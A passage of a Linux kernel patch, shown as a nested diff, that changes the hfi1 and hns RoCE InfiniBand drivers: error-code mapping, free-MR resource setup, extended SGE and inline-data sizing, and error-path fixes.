+@@ -1856,6 +1861,7 @@ int parse_platform_config(struct hfi1_devdata *dd)
+ 					   __func__, table_type,
+ 					   (ptr -
+ 					    (u32 *)dd->platform_config.data));
++				ret = -EINVAL;
+ 				goto bail; /* We don't trust this file now */
+ 			}
+ 			pcfgcache->config_tables[table_type].table_metadata =
+diff --git a/drivers/infiniband/hw/hns/hns_roce_device.h b/drivers/infiniband/hw/hns/hns_roce_device.h
+index 723e55a7de8d9..f701cc86896b3 100644
+--- a/drivers/infiniband/hw/hns/hns_roce_device.h
++++ b/drivers/infiniband/hw/hns/hns_roce_device.h
+@@ -202,6 +202,7 @@ struct hns_roce_ucontext {
+ 	struct list_head	page_list;
+ 	struct mutex		page_mutex;
+ 	struct hns_user_mmap_entry *db_mmap_entry;
++	u32			config;
+ };
+ 
+ struct hns_roce_pd {
+@@ -334,6 +335,7 @@ struct hns_roce_wq {
+ 	u32		head;
+ 	u32		tail;
+ 	void __iomem	*db_reg;
++	u32		ext_sge_cnt;
+ };
+ 
+ struct hns_roce_sge {
+@@ -635,6 +637,7 @@ struct hns_roce_qp {
+ 	struct list_head	rq_node; /* all recv qps are on a list */
+ 	struct list_head	sq_node; /* all send qps are on a list */
+ 	struct hns_user_mmap_entry *dwqe_mmap_entry;
++	u32			config;
+ };
+ 
+ struct hns_roce_ib_iboe {
+diff --git a/drivers/infiniband/hw/hns/hns_roce_hw_v2.c b/drivers/infiniband/hw/hns/hns_roce_hw_v2.c
+index 1435fe2ea176f..b2421883993b1 100644
+--- a/drivers/infiniband/hw/hns/hns_roce_hw_v2.c
++++ b/drivers/infiniband/hw/hns/hns_roce_hw_v2.c
+@@ -192,7 +192,6 @@ static int fill_ext_sge_inl_data(struct hns_roce_qp *qp,
+ 				 unsigned int *sge_idx, u32 msg_len)
+ {
+ 	struct ib_device *ibdev = &(to_hr_dev(qp->ibqp.device))->ib_dev;
+-	unsigned int ext_sge_sz = qp->sq.max_gs * HNS_ROCE_SGE_SIZE;
+ 	unsigned int left_len_in_pg;
+ 	unsigned int idx = *sge_idx;
+ 	unsigned int i = 0;
+@@ -200,7 +199,7 @@ static int fill_ext_sge_inl_data(struct hns_roce_qp *qp,
+ 	void *addr;
+ 	void *dseg;
+ 
+-	if (msg_len > ext_sge_sz) {
++	if (msg_len > qp->sq.ext_sge_cnt * HNS_ROCE_SGE_SIZE) {
+ 		ibdev_err(ibdev,
+ 			  "no enough extended sge space for inline data.\n");
+ 		return -EINVAL;
+@@ -1274,6 +1273,30 @@ static void update_cmdq_status(struct hns_roce_dev *hr_dev)
+ 		hr_dev->cmd.state = HNS_ROCE_CMDQ_STATE_FATAL_ERR;
+ }
+ 
++static int hns_roce_cmd_err_convert_errno(u16 desc_ret)
++{
++	struct hns_roce_cmd_errcode errcode_table[] = {
++		{CMD_EXEC_SUCCESS, 0},
++		{CMD_NO_AUTH, -EPERM},
++		{CMD_NOT_EXIST, -EOPNOTSUPP},
++		{CMD_CRQ_FULL, -EXFULL},
++		{CMD_NEXT_ERR, -ENOSR},
++		{CMD_NOT_EXEC, -ENOTBLK},
++		{CMD_PARA_ERR, -EINVAL},
++		{CMD_RESULT_ERR, -ERANGE},
++		{CMD_TIMEOUT, -ETIME},
++		{CMD_HILINK_ERR, -ENOLINK},
++		{CMD_INFO_ILLEGAL, -ENXIO},
++		{CMD_INVALID, -EBADR},
++	};
++	u16 i;
++
++	for (i = 0; i < ARRAY_SIZE(errcode_table); i++)
++		if (desc_ret == errcode_table[i].return_status)
++			return errcode_table[i].errno;
++	return -EIO;
++}
++
+ static int __hns_roce_cmq_send(struct hns_roce_dev *hr_dev,
+ 			       struct hns_roce_cmq_desc *desc, int num)
+ {
+@@ -1319,7 +1342,7 @@ static int __hns_roce_cmq_send(struct hns_roce_dev *hr_dev,
+ 			dev_err_ratelimited(hr_dev->dev,
+ 					    "Cmdq IO error, opcode = 0x%x, return = 0x%x.\n",
+ 					    desc->opcode, desc_ret);
+-			ret = -EIO;
++			ret = hns_roce_cmd_err_convert_errno(desc_ret);
+ 		}
+ 	} else {
+ 		/* FW/HW reset or incorrect number of desc */
+@@ -2024,13 +2047,14 @@ static void set_default_caps(struct hns_roce_dev *hr_dev)
+ 
+ 	caps->flags |= HNS_ROCE_CAP_FLAG_ATOMIC | HNS_ROCE_CAP_FLAG_MW |
+ 		       HNS_ROCE_CAP_FLAG_SRQ | HNS_ROCE_CAP_FLAG_FRMR |
+-		       HNS_ROCE_CAP_FLAG_QP_FLOW_CTRL | HNS_ROCE_CAP_FLAG_XRC;
++		       HNS_ROCE_CAP_FLAG_QP_FLOW_CTRL;
+ 
+ 	caps->gid_table_len[0] = HNS_ROCE_V2_GID_INDEX_NUM;
+ 
+ 	if (hr_dev->pci_dev->revision >= PCI_REVISION_ID_HIP09) {
+ 		caps->flags |= HNS_ROCE_CAP_FLAG_STASH |
+-			       HNS_ROCE_CAP_FLAG_DIRECT_WQE;
++			       HNS_ROCE_CAP_FLAG_DIRECT_WQE |
++			       HNS_ROCE_CAP_FLAG_XRC;
+ 		caps->max_sq_inline = HNS_ROCE_V3_MAX_SQ_INLINE;
+ 	} else {
+ 		caps->max_sq_inline = HNS_ROCE_V2_MAX_SQ_INLINE;
+@@ -2342,6 +2366,9 @@ static int hns_roce_query_pf_caps(struct hns_roce_dev *hr_dev)
+ 	caps->wqe_sge_hop_num = hr_reg_read(resp_d, PF_CAPS_D_EX_SGE_HOP_NUM);
+ 	caps->wqe_rq_hop_num = hr_reg_read(resp_d, PF_CAPS_D_RQWQE_HOP_NUM);
+ 
++	if (!(caps->page_size_cap & PAGE_SIZE))
++		caps->page_size_cap = HNS_ROCE_V2_PAGE_SIZE_SUPPORTED;
++
+ 	return 0;
+ }
+ 
+@@ -2631,31 +2658,124 @@ static void free_dip_list(struct hns_roce_dev *hr_dev)
+ 	spin_unlock_irqrestore(&hr_dev->dip_list_lock, flags);
+ }
+ 
+-static void free_mr_exit(struct hns_roce_dev *hr_dev)
++static struct ib_pd *free_mr_init_pd(struct hns_roce_dev *hr_dev)
++{
++	struct hns_roce_v2_priv *priv = hr_dev->priv;
++	struct hns_roce_v2_free_mr *free_mr = &priv->free_mr;
++	struct ib_device *ibdev = &hr_dev->ib_dev;
++	struct hns_roce_pd *hr_pd;
++	struct ib_pd *pd;
++
++	hr_pd = kzalloc(sizeof(*hr_pd), GFP_KERNEL);
++	if (ZERO_OR_NULL_PTR(hr_pd))
++		return NULL;
++	pd = &hr_pd->ibpd;
++	pd->device = ibdev;
++
++	if (hns_roce_alloc_pd(pd, NULL)) {
++		ibdev_err(ibdev, "failed to create pd for free mr.\n");
++		kfree(hr_pd);
++		return NULL;
++	}
++	free_mr->rsv_pd = to_hr_pd(pd);
++	free_mr->rsv_pd->ibpd.device = &hr_dev->ib_dev;
++	free_mr->rsv_pd->ibpd.uobject = NULL;
++	free_mr->rsv_pd->ibpd.__internal_mr = NULL;
++	atomic_set(&free_mr->rsv_pd->ibpd.usecnt, 0);
++
++	return pd;
++}
++
++static struct ib_cq *free_mr_init_cq(struct hns_roce_dev *hr_dev)
+ {
+ 	struct hns_roce_v2_priv *priv = hr_dev->priv;
+ 	struct hns_roce_v2_free_mr *free_mr = &priv->free_mr;
++	struct ib_device *ibdev = &hr_dev->ib_dev;
++	struct ib_cq_init_attr cq_init_attr = {};
++	struct hns_roce_cq *hr_cq;
++	struct ib_cq *cq;
++
++	cq_init_attr.cqe = HNS_ROCE_FREE_MR_USED_CQE_NUM;
++
++	hr_cq = kzalloc(sizeof(*hr_cq), GFP_KERNEL);
++	if (ZERO_OR_NULL_PTR(hr_cq))
++		return NULL;
++
++	cq = &hr_cq->ib_cq;
++	cq->device = ibdev;
++
++	if (hns_roce_create_cq(cq, &cq_init_attr, NULL)) {
++		ibdev_err(ibdev, "failed to create cq for free mr.\n");
++		kfree(hr_cq);
++		return NULL;
++	}
++	free_mr->rsv_cq = to_hr_cq(cq);
++	free_mr->rsv_cq->ib_cq.device = &hr_dev->ib_dev;
++	free_mr->rsv_cq->ib_cq.uobject = NULL;
++	free_mr->rsv_cq->ib_cq.comp_handler = NULL;
++	free_mr->rsv_cq->ib_cq.event_handler = NULL;
++	free_mr->rsv_cq->ib_cq.cq_context = NULL;
++	atomic_set(&free_mr->rsv_cq->ib_cq.usecnt, 0);
++
++	return cq;
++}
++
++static int free_mr_init_qp(struct hns_roce_dev *hr_dev, struct ib_cq *cq,
++			   struct ib_qp_init_attr *init_attr, int i)
++{
++	struct hns_roce_v2_priv *priv = hr_dev->priv;
++	struct hns_roce_v2_free_mr *free_mr = &priv->free_mr;
++	struct ib_device *ibdev = &hr_dev->ib_dev;
++	struct hns_roce_qp *hr_qp;
++	struct ib_qp *qp;
+ 	int ret;
++
++	hr_qp = kzalloc(sizeof(*hr_qp), GFP_KERNEL);
++	if (ZERO_OR_NULL_PTR(hr_qp))
++		return -ENOMEM;
++
++	qp = &hr_qp->ibqp;
++	qp->device = ibdev;
++
++	ret = hns_roce_create_qp(qp, init_attr, NULL);
++	if (ret) {
++		ibdev_err(ibdev, "failed to create qp for free mr.\n");
++		kfree(hr_qp);
++		return ret;
++	}
++
++	free_mr->rsv_qp[i] = hr_qp;
++	free_mr->rsv_qp[i]->ibqp.recv_cq = cq;
++	free_mr->rsv_qp[i]->ibqp.send_cq = cq;
++
++	return 0;
++}
++
++static void free_mr_exit(struct hns_roce_dev *hr_dev)
++{
++	struct hns_roce_v2_priv *priv = hr_dev->priv;
++	struct hns_roce_v2_free_mr *free_mr = &priv->free_mr;
++	struct ib_qp *qp;
+ 	int i;
+ 
+ 	for (i = 0; i < ARRAY_SIZE(free_mr->rsv_qp); i++) {
+ 		if (free_mr->rsv_qp[i]) {
+-			ret = ib_destroy_qp(free_mr->rsv_qp[i]);
+-			if (ret)
+-				ibdev_err(&hr_dev->ib_dev,
+-					  "failed to destroy qp in free mr.\n");
+-
++			qp = &free_mr->rsv_qp[i]->ibqp;
++			hns_roce_v2_destroy_qp(qp, NULL);
++			kfree(free_mr->rsv_qp[i]);
+ 			free_mr->rsv_qp[i] = NULL;
+ 		}
+ 	}
+ 
+ 	if (free_mr->rsv_cq) {
+-		ib_destroy_cq(free_mr->rsv_cq);
++		hns_roce_destroy_cq(&free_mr->rsv_cq->ib_cq, NULL);
++		kfree(free_mr->rsv_cq);
+ 		free_mr->rsv_cq = NULL;
+ 	}
+ 
+ 	if (free_mr->rsv_pd) {
+-		ib_dealloc_pd(free_mr->rsv_pd);
++		hns_roce_dealloc_pd(&free_mr->rsv_pd->ibpd, NULL);
++		kfree(free_mr->rsv_pd);
+ 		free_mr->rsv_pd = NULL;
+ 	}
+ }
+@@ -2664,55 +2784,46 @@ static int free_mr_alloc_res(struct hns_roce_dev *hr_dev)
+ {
+ 	struct hns_roce_v2_priv *priv = hr_dev->priv;
+ 	struct hns_roce_v2_free_mr *free_mr = &priv->free_mr;
+-	struct ib_device *ibdev = &hr_dev->ib_dev;
+-	struct ib_cq_init_attr cq_init_attr = {};
+ 	struct ib_qp_init_attr qp_init_attr = {};
+ 	struct ib_pd *pd;
+ 	struct ib_cq *cq;
+-	struct ib_qp *qp;
+ 	int ret;
+ 	int i;
+ 
+-	pd = ib_alloc_pd(ibdev, 0);
+-	if (IS_ERR(pd)) {
+-		ibdev_err(ibdev, "failed to create pd for free mr.\n");
+-		return PTR_ERR(pd);
+-	}
+-	free_mr->rsv_pd = pd;
++	pd = free_mr_init_pd(hr_dev);
++	if (!pd)
++		return -ENOMEM;
+ 
+-	cq_init_attr.cqe = HNS_ROCE_FREE_MR_USED_CQE_NUM;
+-	cq = ib_create_cq(ibdev, NULL, NULL, NULL, &cq_init_attr);
+-	if (IS_ERR(cq)) {
+-		ibdev_err(ibdev, "failed to create cq for free mr.\n");
+-		ret = PTR_ERR(cq);
+-		goto create_failed;
++	cq = free_mr_init_cq(hr_dev);
++	if (!cq) {
++		ret = -ENOMEM;
++		goto create_failed_cq;
+ 	}
+-	free_mr->rsv_cq = cq;
+ 
+ 	qp_init_attr.qp_type = IB_QPT_RC;
+ 	qp_init_attr.sq_sig_type = IB_SIGNAL_ALL_WR;
+-	qp_init_attr.send_cq = free_mr->rsv_cq;
+-	qp_init_attr.recv_cq = free_mr->rsv_cq;
++	qp_init_attr.send_cq = cq;
++	qp_init_attr.recv_cq = cq;
+ 	for (i = 0; i < ARRAY_SIZE(free_mr->rsv_qp); i++) {
+ 		qp_init_attr.cap.max_send_wr = HNS_ROCE_FREE_MR_USED_SQWQE_NUM;
+ 		qp_init_attr.cap.max_send_sge = HNS_ROCE_FREE_MR_USED_SQSGE_NUM;
+ 		qp_init_attr.cap.max_recv_wr = HNS_ROCE_FREE_MR_USED_RQWQE_NUM;
+ 		qp_init_attr.cap.max_recv_sge = HNS_ROCE_FREE_MR_USED_RQSGE_NUM;
+ 
+-		qp = ib_create_qp(free_mr->rsv_pd, &qp_init_attr);
+-		if (IS_ERR(qp)) {
+-			ibdev_err(ibdev, "failed to create qp for free mr.\n");
+-			ret = PTR_ERR(qp);
+-			goto create_failed;
+-		}
+-
+-		free_mr->rsv_qp[i] = qp;
++		ret = free_mr_init_qp(hr_dev, cq, &qp_init_attr, i);
++		if (ret)
++			goto create_failed_qp;
+ 	}
+ 
+ 	return 0;
+ 
+-create_failed:
+-	free_mr_exit(hr_dev);
++create_failed_qp:
++	hns_roce_destroy_cq(cq, NULL);
++	kfree(cq);
++
++create_failed_cq:
++	hns_roce_dealloc_pd(pd, NULL);
++	kfree(pd);
+ 
+ 	return ret;
+ }
+@@ -2728,14 +2839,17 @@ static int free_mr_modify_rsv_qp(struct hns_roce_dev *hr_dev,
+ 	int mask;
+ 	int ret;
+ 
+-	hr_qp = to_hr_qp(free_mr->rsv_qp[sl_num]);
++	hr_qp = to_hr_qp(&free_mr->rsv_qp[sl_num]->ibqp);
+ 	hr_qp->free_mr_en = 1;
++	hr_qp->ibqp.device = ibdev;
++	hr_qp->ibqp.qp_type = IB_QPT_RC;
+ 
+ 	mask = IB_QP_STATE | IB_QP_PKEY_INDEX | IB_QP_PORT | IB_QP_ACCESS_FLAGS;
+ 	attr->qp_state = IB_QPS_INIT;
+ 	attr->port_num = 1;
+ 	attr->qp_access_flags = IB_ACCESS_REMOTE_WRITE;
+-	ret = ib_modify_qp(&hr_qp->ibqp, attr, mask);
++	ret = hr_dev->hw->modify_qp(&hr_qp->ibqp, attr, mask, IB_QPS_INIT,
++				    IB_QPS_INIT);
+ 	if (ret) {
+ 		ibdev_err(ibdev, "failed to modify qp to init, ret = %d.\n",
+ 			  ret);
+@@ -2756,7 +2870,8 @@ static int free_mr_modify_rsv_qp(struct hns_roce_dev *hr_dev,
+ 
+ 	rdma_ah_set_sl(&attr->ah_attr, (u8)sl_num);
+ 
+-	ret = ib_modify_qp(&hr_qp->ibqp, attr, mask);
++	ret = hr_dev->hw->modify_qp(&hr_qp->ibqp, attr, mask, IB_QPS_INIT,
++				    IB_QPS_RTR);
+ 	hr_dev->loop_idc = loopback;
+ 	if (ret) {
+ 		ibdev_err(ibdev, "failed to modify qp to rtr, ret = %d.\n",
+@@ -2770,7 +2885,8 @@ static int free_mr_modify_rsv_qp(struct hns_roce_dev *hr_dev,
+ 	attr->sq_psn = HNS_ROCE_FREE_MR_USED_PSN;
+ 	attr->retry_cnt = HNS_ROCE_FREE_MR_USED_QP_RETRY_CNT;
+ 	attr->timeout = HNS_ROCE_FREE_MR_USED_QP_TIMEOUT;
+-	ret = ib_modify_qp(&hr_qp->ibqp, attr, mask);
++	ret = hr_dev->hw->modify_qp(&hr_qp->ibqp, attr, mask, IB_QPS_RTR,
++				    IB_QPS_RTS);
+ 	if (ret)
+ 		ibdev_err(ibdev, "failed to modify qp to rts, ret = %d.\n",
+ 			  ret);
+@@ -3186,7 +3302,8 @@ static int set_mtpt_pbl(struct hns_roce_dev *hr_dev,
+ 	int i, count;
+ 
+ 	count = hns_roce_mtr_find(hr_dev, &mr->pbl_mtr, 0, pages,
+-				  ARRAY_SIZE(pages), &pbl_ba);
++				  min_t(int, ARRAY_SIZE(pages), mr->npages),
++				  &pbl_ba);
+ 	if (count < 1) {
+ 		ibdev_err(ibdev, "failed to find PBL mtr, count = %d.\n",
+ 			  count);
+@@ -3414,7 +3531,7 @@ static void free_mr_send_cmd_to_hw(struct hns_roce_dev *hr_dev)
+ 	mutex_lock(&free_mr->mutex);
+ 
+ 	for (i = 0; i < ARRAY_SIZE(free_mr->rsv_qp); i++) {
+-		hr_qp = to_hr_qp(free_mr->rsv_qp[i]);
++		hr_qp = free_mr->rsv_qp[i];
+ 
+ 		ret = free_mr_post_send_lp_wqe(hr_qp);
+ 		if (ret) {
+@@ -3429,7 +3546,7 @@ static void free_mr_send_cmd_to_hw(struct hns_roce_dev *hr_dev)
+ 
+ 	end = msecs_to_jiffies(HNS_ROCE_V2_FREE_MR_TIMEOUT) + jiffies;
+ 	while (cqe_cnt) {
+-		npolled = hns_roce_v2_poll_cq(free_mr->rsv_cq, cqe_cnt, wc);
++		npolled = hns_roce_v2_poll_cq(&free_mr->rsv_cq->ib_cq, cqe_cnt, wc);
+ 		if (npolled < 0) {
+ 			ibdev_err(ibdev,
+ 				  "failed to poll cqe for free mr, remain %d cqe.\n",
+@@ -5375,6 +5492,8 @@ static int hns_roce_v2_query_qp(struct ib_qp *ibqp, struct ib_qp_attr *qp_attr,
+ 
+ 		rdma_ah_set_sl(&qp_attr->ah_attr,
+ 			       hr_reg_read(&context, QPC_SL));
++		rdma_ah_set_port_num(&qp_attr->ah_attr, hr_qp->port + 1);
++		rdma_ah_set_ah_flags(&qp_attr->ah_attr, IB_AH_GRH);
+ 		grh->flow_label = hr_reg_read(&context, QPC_FL);
+ 		grh->sgid_index = hr_reg_read(&context, QPC_GMV_IDX);
+ 		grh->hop_limit = hr_reg_read(&context, QPC_HOPLIMIT);
+@@ -5468,7 +5587,7 @@ static int hns_roce_v2_destroy_qp_common(struct hns_roce_dev *hr_dev,
+ 	return ret;
+ }
+ 
+-static int hns_roce_v2_destroy_qp(struct ib_qp *ibqp, struct ib_udata *udata)
++int hns_roce_v2_destroy_qp(struct ib_qp *ibqp, struct ib_udata *udata)
+ {
+ 	struct hns_roce_dev *hr_dev = to_hr_dev(ibqp->device);
+ 	struct hns_roce_qp *hr_qp = to_hr_qp(ibqp);
+diff --git a/drivers/infiniband/hw/hns/hns_roce_hw_v2.h b/drivers/infiniband/hw/hns/hns_roce_hw_v2.h
+index c7bf2d52c1cdb..b1b3e1e0b84e5 100644
+--- a/drivers/infiniband/hw/hns/hns_roce_hw_v2.h
++++ b/drivers/infiniband/hw/hns/hns_roce_hw_v2.h
+@@ -272,6 +272,11 @@ enum hns_roce_cmd_return_status {
+ 	CMD_OTHER_ERR = 0xff
+ };
+ 
++struct hns_roce_cmd_errcode {
++	enum hns_roce_cmd_return_status return_status;
++	int errno;
++};
++
+ enum hns_roce_sgid_type {
+ 	GID_TYPE_FLAG_ROCE_V1 = 0,
+ 	GID_TYPE_FLAG_ROCE_V2_IPV4,
+@@ -1327,9 +1332,9 @@ struct hns_roce_link_table {
+ #define HNS_ROCE_EXT_LLM_MIN_PAGES(que_num) ((que_num) * 4 + 2)
+ 
+ struct hns_roce_v2_free_mr {
+-	struct ib_qp *rsv_qp[HNS_ROCE_FREE_MR_USED_QP_NUM];
+-	struct ib_cq *rsv_cq;
+-	struct ib_pd *rsv_pd;
++	struct hns_roce_qp *rsv_qp[HNS_ROCE_FREE_MR_USED_QP_NUM];
++	struct hns_roce_cq *rsv_cq;
++	struct hns_roce_pd *rsv_pd;
+ 	struct mutex mutex;
+ };
+ 
+@@ -1459,6 +1464,8 @@ struct hns_roce_sccc_clr_done {
+ 	__le32 rsv[5];
+ };
+ 
++int hns_roce_v2_destroy_qp(struct ib_qp *ibqp, struct ib_udata *udata);
++
+ static inline void hns_roce_write64(struct hns_roce_dev *hr_dev, __le32 val[2],
+ 				    void __iomem *dest)
+ {
+diff --git a/drivers/infiniband/hw/hns/hns_roce_main.c b/drivers/infiniband/hw/hns/hns_roce_main.c
+index dcf89689a4c62..8ba68ac12388d 100644
+--- a/drivers/infiniband/hw/hns/hns_roce_main.c
++++ b/drivers/infiniband/hw/hns/hns_roce_main.c
+@@ -354,10 +354,11 @@ static int hns_roce_alloc_uar_entry(struct ib_ucontext *uctx)
+ static int hns_roce_alloc_ucontext(struct ib_ucontext *uctx,
+ 				   struct ib_udata *udata)
+ {
+-	int ret;
+ 	struct hns_roce_ucontext *context = to_hr_ucontext(uctx);
+-	struct hns_roce_ib_alloc_ucontext_resp resp = {};
+ 	struct hns_roce_dev *hr_dev = to_hr_dev(uctx->device);
++	struct hns_roce_ib_alloc_ucontext_resp resp = {};
++	struct hns_roce_ib_alloc_ucontext ucmd = {};
++	int ret;
+ 
+ 	if (!hr_dev->active)
+ 		return -EAGAIN;
+@@ -365,6 +366,19 @@ static int hns_roce_alloc_ucontext(struct ib_ucontext *uctx,
+ 	resp.qp_tab_size = hr_dev->caps.num_qps;
+ 	resp.srq_tab_size = hr_dev->caps.num_srqs;
+ 
++	ret = ib_copy_from_udata(&ucmd, udata,
++				 min(udata->inlen, sizeof(ucmd)));
++	if (ret)
++		return ret;
++
++	if (hr_dev->pci_dev->revision >= PCI_REVISION_ID_HIP09)
++		context->config = ucmd.config & HNS_ROCE_EXSGE_FLAGS;
++
++	if (context->config & HNS_ROCE_EXSGE_FLAGS) {
++		resp.config |= HNS_ROCE_RSP_EXSGE_FLAGS;
++		resp.max_inline_data = hr_dev->caps.max_sq_inline;
++	}
++
+ 	ret = hns_roce_uar_alloc(hr_dev, &context->uar);
+ 	if (ret)
+ 		goto error_fail_uar_alloc;
+diff --git a/drivers/infiniband/hw/hns/hns_roce_mr.c b/drivers/infiniband/hw/hns/hns_roce_mr.c
+index 845ac7d3831f4..37a5cf62f88b4 100644
+--- a/drivers/infiniband/hw/hns/hns_roce_mr.c
++++ b/drivers/infiniband/hw/hns/hns_roce_mr.c
+@@ -392,10 +392,10 @@ struct ib_mr *hns_roce_alloc_mr(struct ib_pd *pd, enum ib_mr_type mr_type,
+ 
+ 	return &mr->ibmr;
+ 
+-err_key:
+-	free_mr_key(hr_dev, mr);
+ err_pbl:
+ 	free_mr_pbl(hr_dev, mr);
++err_key:
++	free_mr_key(hr_dev, mr);
+ err_free:
+ 	kfree(mr);
+ 	return ERR_PTR(ret);
+diff --git a/drivers/infiniband/hw/hns/hns_roce_qp.c b/drivers/infiniband/hw/hns/hns_roce_qp.c
+index f0bd82a18069a..0ae335fb205ca 100644
+--- a/drivers/infiniband/hw/hns/hns_roce_qp.c
++++ b/drivers/infiniband/hw/hns/hns_roce_qp.c
+@@ -476,38 +476,109 @@ static int set_rq_size(struct hns_roce_dev *hr_dev, struct ib_qp_cap *cap,
+ 	return 0;
+ }
+ 
+-static u32 get_wqe_ext_sge_cnt(struct hns_roce_qp *qp)
++static u32 get_max_inline_data(struct hns_roce_dev *hr_dev,
++			       struct ib_qp_cap *cap)
+ {
+-	/* GSI/UD QP only has extended sge */
+-	if (qp->ibqp.qp_type == IB_QPT_GSI || qp->ibqp.qp_type == IB_QPT_UD)
+-		return qp->sq.max_gs;
+-
+-	if (qp->sq.max_gs > HNS_ROCE_SGE_IN_WQE)
+-		return qp->sq.max_gs - HNS_ROCE_SGE_IN_WQE;
++	if (cap->max_inline_data) {
++		cap->max_inline_data = roundup_pow_of_two(cap->max_inline_data);
++		return min(cap->max_inline_data,
++			   hr_dev->caps.max_sq_inline);
++	}
+ 
+ 	return 0;
+ }
+ 
++static void update_inline_data(struct hns_roce_qp *hr_qp,
++			       struct ib_qp_cap *cap)
++{
++	u32 sge_num = hr_qp->sq.ext_sge_cnt;
++
++	if (hr_qp->config & HNS_ROCE_EXSGE_FLAGS) {
++		if (!(hr_qp->ibqp.qp_type == IB_QPT_GSI ||
++		      hr_qp->ibqp.qp_type == IB_QPT_UD))
++			sge_num = max((u32)HNS_ROCE_SGE_IN_WQE, sge_num);
++
++		cap->max_inline_data = max(cap->max_inline_data,
++					   sge_num * HNS_ROCE_SGE_SIZE);
++	}
++
++	hr_qp->max_inline_data = cap->max_inline_data;
++}
++
++static u32 get_sge_num_from_max_send_sge(bool is_ud_or_gsi,
++					 u32 max_send_sge)
++{
++	unsigned int std_sge_num;
++	unsigned int min_sge;
++
++	std_sge_num = is_ud_or_gsi ? 0 : HNS_ROCE_SGE_IN_WQE;
++	min_sge = is_ud_or_gsi ? 1 : 0;
++	return max_send_sge > std_sge_num ? (max_send_sge - std_sge_num) :
++				min_sge;
++}
++
++static unsigned int get_sge_num_from_max_inl_data(bool is_ud_or_gsi,
++						  u32 max_inline_data)
++{
++	unsigned int inline_sge;
++
++	inline_sge = roundup_pow_of_two(max_inline_data) / HNS_ROCE_SGE_SIZE;
++
++	/*
++	 * if max_inline_data less than
++	 * HNS_ROCE_SGE_IN_WQE * HNS_ROCE_SGE_SIZE,
++	 * In addition to ud's mode, no need to extend sge.
++	 */
++	if (!is_ud_or_gsi && inline_sge <= HNS_ROCE_SGE_IN_WQE)
++		inline_sge = 0;
++
++	return inline_sge;
++}
++
+ static void set_ext_sge_param(struct hns_roce_dev *hr_dev, u32 sq_wqe_cnt,
+ 			      struct hns_roce_qp *hr_qp, struct ib_qp_cap *cap)
+ {
++	bool is_ud_or_gsi = (hr_qp->ibqp.qp_type == IB_QPT_GSI ||
++				hr_qp->ibqp.qp_type == IB_QPT_UD);
++	unsigned int std_sge_num;
++	u32 inline_ext_sge = 0;
++	u32 ext_wqe_sge_cnt;
+ 	u32 total_sge_cnt;
+-	u32 wqe_sge_cnt;
++
++	cap->max_inline_data = get_max_inline_data(hr_dev, cap);
+ 
+ 	hr_qp->sge.sge_shift = HNS_ROCE_SGE_SHIFT;
++	std_sge_num = is_ud_or_gsi ? 0 : HNS_ROCE_SGE_IN_WQE;
++	ext_wqe_sge_cnt = get_sge_num_from_max_send_sge(is_ud_or_gsi,
++							cap->max_send_sge);
+ 
+-	hr_qp->sq.max_gs = max(1U, cap->max_send_sge);
++	if (hr_qp->config & HNS_ROCE_EXSGE_FLAGS) {
++		inline_ext_sge = max(ext_wqe_sge_cnt,
++				     get_sge_num_from_max_inl_data(is_ud_or_gsi,
++							 cap->max_inline_data));
++		hr_qp->sq.ext_sge_cnt = inline_ext_sge ?
++					roundup_pow_of_two(inline_ext_sge) : 0;
+ 
+-	wqe_sge_cnt = get_wqe_ext_sge_cnt(hr_qp);
++		hr_qp->sq.max_gs = max(1U, (hr_qp->sq.ext_sge_cnt + std_sge_num));
++		hr_qp->sq.max_gs = min(hr_qp->sq.max_gs, hr_dev->caps.max_sq_sg);
++
++		ext_wqe_sge_cnt = hr_qp->sq.ext_sge_cnt;
++	} else {
++		hr_qp->sq.max_gs = max(1U, cap->max_send_sge);
++		hr_qp->sq.max_gs = min(hr_qp->sq.max_gs, hr_dev->caps.max_sq_sg);
++		hr_qp->sq.ext_sge_cnt = hr_qp->sq.max_gs;
++	}
+ 
+ 	/* If the number of extended sge is not zero, they MUST use the
+ 	 * space of HNS_HW_PAGE_SIZE at least.
+ 	 */
+-	if (wqe_sge_cnt) {
+-		total_sge_cnt = roundup_pow_of_two(sq_wqe_cnt * wqe_sge_cnt);
++	if (ext_wqe_sge_cnt) {
++		total_sge_cnt = roundup_pow_of_two(sq_wqe_cnt * ext_wqe_sge_cnt);
+ 		hr_qp->sge.sge_cnt = max(total_sge_cnt,
+ 				(u32)HNS_HW_PAGE_SIZE / HNS_ROCE_SGE_SIZE);
+ 	}
++
++	update_inline_data(hr_qp, cap);
+ }
+ 
+ static int check_sq_size_with_integrity(struct hns_roce_dev *hr_dev,
+@@ -556,6 +627,7 @@ static int set_user_sq_size(struct hns_roce_dev *hr_dev,
+ 
+ 	hr_qp->sq.wqe_shift = ucmd->log_sq_stride;
+ 	hr_qp->sq.wqe_cnt = cnt;
++	cap->max_send_sge = hr_qp->sq.max_gs;
+ 
+ 	return 0;
+ }
+@@ -986,13 +1058,9 @@ static int set_qp_param(struct hns_roce_dev *hr_dev, struct hns_roce_qp *hr_qp,
+ 			struct hns_roce_ib_create_qp *ucmd)
+ {
+ 	struct ib_device *ibdev = &hr_dev->ib_dev;
++	struct hns_roce_ucontext *uctx;
+ 	int ret;
+ 
+-	if (init_attr->cap.max_inline_data > hr_dev->caps.max_sq_inline)
+-		init_attr->cap.max_inline_data = hr_dev->caps.max_sq_inline;
+-
+-	hr_qp->max_inline_data = init_attr->cap.max_inline_data;
+-
+ 	if (init_attr->sq_sig_type == IB_SIGNAL_ALL_WR)
+ 		hr_qp->sq_signal_bits = IB_SIGNAL_ALL_WR;
+ 	else
+@@ -1015,12 +1083,17 @@ static int set_qp_param(struct hns_roce_dev *hr_dev, struct hns_roce_qp *hr_qp,
+ 			return ret;
+ 		}
+ 
++		uctx = rdma_udata_to_drv_context(udata, struct hns_roce_ucontext,
++						 ibucontext);
++		hr_qp->config = uctx->config;
+ 		ret = set_user_sq_size(hr_dev, &init_attr->cap, hr_qp, ucmd);
+ 		if (ret)
+ 			ibdev_err(ibdev,
+ 				  "failed to set user SQ size, ret = %d.\n",
+ 				  ret);
+ 	} else {
++		if (hr_dev->pci_dev->revision >= PCI_REVISION_ID_HIP09)
++			hr_qp->config = HNS_ROCE_EXSGE_FLAGS;
+ 		ret = set_kernel_sq_size(hr_dev, &init_attr->cap, hr_qp);
+ 		if (ret)
+ 			ibdev_err(ibdev,
+diff --git a/drivers/infiniband/hw/irdma/uk.c b/drivers/infiniband/hw/irdma/uk.c
+index a6e5d350a94ce..16183e894da77 100644
+--- a/drivers/infiniband/hw/irdma/uk.c
++++ b/drivers/infiniband/hw/irdma/uk.c
